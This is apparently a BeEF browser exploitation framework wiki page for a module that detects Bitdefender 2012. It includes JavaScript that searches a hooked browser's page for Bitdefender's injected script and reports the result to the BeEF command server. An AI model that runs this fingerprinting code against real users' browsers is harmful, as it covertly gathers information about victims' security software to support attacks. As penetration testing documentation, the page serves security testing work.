-
Notifications
You must be signed in to change notification settings - Fork 2.3k
Module: detect bitdefender2012
Nbblrr edited this page Jun 13, 2013
·
2 revisions
##Summary
- Objective: Detect Bit Defender 2012 on the system
- Date: June 2013
- Authors: Nbblrr
- Browsers: All
- Code
##Internal Working
Bit Defender 2012 includes a javascript script in each browser to display this bar : Images/module_bitdefender2012_bar.png
So it is easy to look for the script in the DOM :
var temp=document.body.innerHTML;
var key="netdefender/hui/ndhui.js";
if(temp.indexOf(key)>0) {
beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Installed');
} else {
beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Not Installed');
};Images/module_bitdefender2012_bar.png
Images/module-detect-bitdefender2012.png
##Feedback
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK